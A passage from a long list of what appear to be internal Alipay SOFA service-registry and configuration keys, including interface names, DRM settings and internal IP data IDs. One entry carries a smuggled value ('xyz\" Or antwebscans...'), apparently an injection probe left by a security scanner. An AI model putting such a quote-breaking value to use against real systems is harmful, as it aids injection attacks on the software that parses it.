CE_ID#@#SOFA_ROUTER","DATA_ID_11.167.220.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_AUTHCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gmportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceSyncExecuteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:xyz\" Or antwebscansYW50=ODAxMDIwNTMtdW5pcXVlSWQtMTEwMDAyMDEw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.mng.service.EventTaskManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.SwitchCoreGrayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.SidecarQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.api.GenericService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kabaoprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airquery.uds.UdsCommonServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mfinquotationprod.common.service.falcon.facade.api.SymbolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finsign.common.service.facade.finauth.service.LargeSignAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumequery.common.service.facade.DynamicConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.AntSearchManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundboss.common.service.facade.singleha.HaAggregationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngCommodityManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbhub.common.service.facade.api.message.MessageSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:orgPCallbackHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.workbench.AntWorkInformManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.adbasiclib.common.service.facade.promotepage.LiuziScoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.97.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.minRecycleExportAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudbox:name=com.alipay.cloudbox.biz.drm.ConfigDrmResource.reloadConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.prodcenter.common.service.facade.contract.custom.api.AgreementPayUserContractOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:insttrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mirrormng.facade.api.MirrorScheduleTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_ANTLAW#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.248.87#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.12.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zpaas.facade.api.ReleaseAppInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:buaudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.TaskJobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.starstage.facade.StarstageFormModuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycenter.common.service.facade.nac.NacGuidToOtpSwitchFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:PromoPlatform_antfeaturecloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdatabus.service.facade.lineage.DataLineageService:1.0:zdatabus-compatibility-id@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.share.YebQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.isupergwmng:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antcommonweal.common.service.facade.api.AcwEnterpriseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revtrans.common.service.facade.api.CompanyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antfeaturemeta:name=com.alipay.antfeaturelib.core.feature.drm.AntFeatureConfigResource.publishCommand,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ialicore:name=com.ipay.ialicore.common.drm.TenantSwitchControl.defaultTntInstId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.amspm.ardd.common.drm.resource.AppGrayStatusResource.currentMachineGrayStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.1.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.l2WriteCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscenemng.common.service.facade.api.RuleMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.cocurrentQueryTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.appName:name=com.alipay.fc.fluxcons.biz.service.impl.drm.FluxConsDrmResource.clearTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.152.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditauthprod.service.facade.PreConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test9@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.task.TaskOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.query.ShopRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dcepluban@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.manualConstructFundMessage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.finsupport.component.cache.masterdata.drm.MasterdataDRM.unknowTypeFinanceExchangeCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kgcore.common.service.client.tr.GraphTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.hyp.QueryServInfoForHYPFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.InstAbilityTimelinessService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_ACCORDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.common.service.thor.service.ThorOdpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.huabei.facade.HuabeiServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYINTLJSESSIONID.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycore.common.service.facade.policy.IntlSecurityPolicyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofamesh.sofa4RpcMosnServer.facade.Sofa4RpcMosnServerAntvipFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.biz.contract.exterface.ExterfaceOrderOperateServiceImpl.cardNos,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finmobilemarket.common.service.facade.api.HomepageProductDiscoveryAggFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.item.ItemConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mashup:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlForbidWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.apfasmng.common.service.facade.cluster.ClusterFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopStaffPrincipalRelationValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipricecore.common.service.facade.PriceManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketmng.common.service.facade.api.manage.ApiManualManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:admediamgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.antschedulerconsole.facade.JobOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.processmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.213.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdatasync.common.service.facade.DCDataSyncFacade:1.0:mif-merchant-sub-DCDataSyncFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.cloudprovision.cloudprovision_local_slave_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:cockaweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.decisionx.facade.DecisionService:1.0:${decisionx_group}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.tis.service.ZhianService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.user.api.SecuVipUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.118.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.common.dal.drm.scene.FinSceneRuleCenterDrmImpl.starWishHistoryNewConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.item.ItemConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpromo.service.PromoConfigConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.fund.facade.api.MoneyFundWithdrawCardQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.metric.MetricMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdsds.common.service.facade.process.BusinessProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.security.interfaces.facade.api.common.Query:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.product.ProductQueryFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.mcard.api.MCardtransTransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfund.common.service.facade.solution.guarantee.GuaranteeMessageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:scsupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.ipaysales.facade.api.merchant.IpaysalesMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finecorisk.common.facade.service.api.dataAsset.LoadTestAssetClassifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.solution.SolutionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.nuccInstChannelApis,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.prodmng.facade.sync.DataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linepay.common.serivce.facade.mng.check.CheckManipulateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.core.service.hbase.MCubeInfoCacheService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.amlmatrixplus.biz.crr.component.facade.api.RCrrAnalyzeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_CLEARINGCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:guarcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.64.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.store.facade.StoreServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:kbsales@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:airbops_OperateExamCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ADBIZOPT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.ebill.facade.EbillAnnualQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zcif.facade.service.SubjectManagerGzoneService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.serverless.base.facade.ModuleVersionFacade:1.0:arkbasetwo-newtwo-aigd-arkmoduleserverless@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.common.service.facade.alert.AlertQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.Fund123AssetFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.177.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.zskynet.facade.alarmcheck.AppGeneralAnalyseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC-pcinstacc-parsedqc-schedule-serverless@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.finsupport.component.cache.masterdata.drm.ResultStatusSwitchDRM.queryByBizResultStatusSwitchOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.activityNextScheduleTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlequery.common.service.facade.dback.api.OnlineDepositBackSingleQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csrobotmng.service.facade.wutong.WutongCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwdsds.common.service.facade.audit.ExecuteAuditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payplus.common.service.facade.api.AdvanceConsultServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.transcode.facade.TransCodeApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.bdcrm.MigrateOrderLinkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.ContinuePayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@insadvisor#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.19.28.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_BAITIAO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.yunfengdieweb:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imasp.common.service.facade.SubjectContentServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.ProfileConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.52.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbadvert.common.service.integration.authcenter.AuthenticationServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaymember.common.service.facade.config.service.GrowthConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csivr.common.service.facade.api.CsivrOutCallLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.prodcore.service.api.rateprocess.RateProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.common.service.facade.AntassistantSchedulerExecutorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.socialTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.giftprod.common.service.facade.word.WordCrowdCryptoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.BizFuncServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.biz.news.shared.drm.News30ConfigDRMService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:00998@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mdevsupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountcore.common.service.facade.MdiscountUnionPayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.zny.facade.CombinedAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.MerchandiseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_SECURITYPROD_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.frastress.common.service.facade.api.RiskEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintradecenter.common.service.facade.transfer.AccGoldTransferFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.giftpackage.SaleGiftPackageActivityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.167.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbcontent.common.service.facade.api.rank.RankRuleQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.200.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_smartcall_ruleFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_FCRESERVECENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.recommendStarList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_topic#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.finaggexpcore.common.grayengine.config.updateRuleMsg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_socialdispatcher_cluster#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.rone.biz.manager.support.api.CodeTemplateProvider:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.152.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@cicadaxbase#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.superapi.client.SystemAppInvokeService:1.0:gfsettle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:securitydata@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.MacDRMResource.newPlatformTaskServerDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fininflux.common.service.facade.mng.recover.InfluxReceiptRecoverService:1.0:instfluxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ngfesync.facade.sync.NgfeSyncFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.event.ArEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.finsupport.component.serial.drm.ZdalUpgradeSwitchDrm.doubleQuery,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.exchangecore.common.service.facade.ExBatchInfoManagerWService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","rating@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmBizRuleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.openapi.ProdOpenSecuUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fuelprod.core.service.cnpc.InstGasStationsProvider:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.106.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.FacePayService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.hotCompanyUseLocal,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.charityprod.commom.service.facade.CharityDoneeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.realtimecheckprod.common.facade.ExtSceneManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.parameter.CommonParameterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.component.spi.common.ComponentMeteDataConsultCallbackFacade:1.0:mdeduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.pointmng.generalpointOracleDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.itransferprod.service.facade.api.GeneralTopupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.qc.AssetInvestigationOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.118.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alphad.common.ser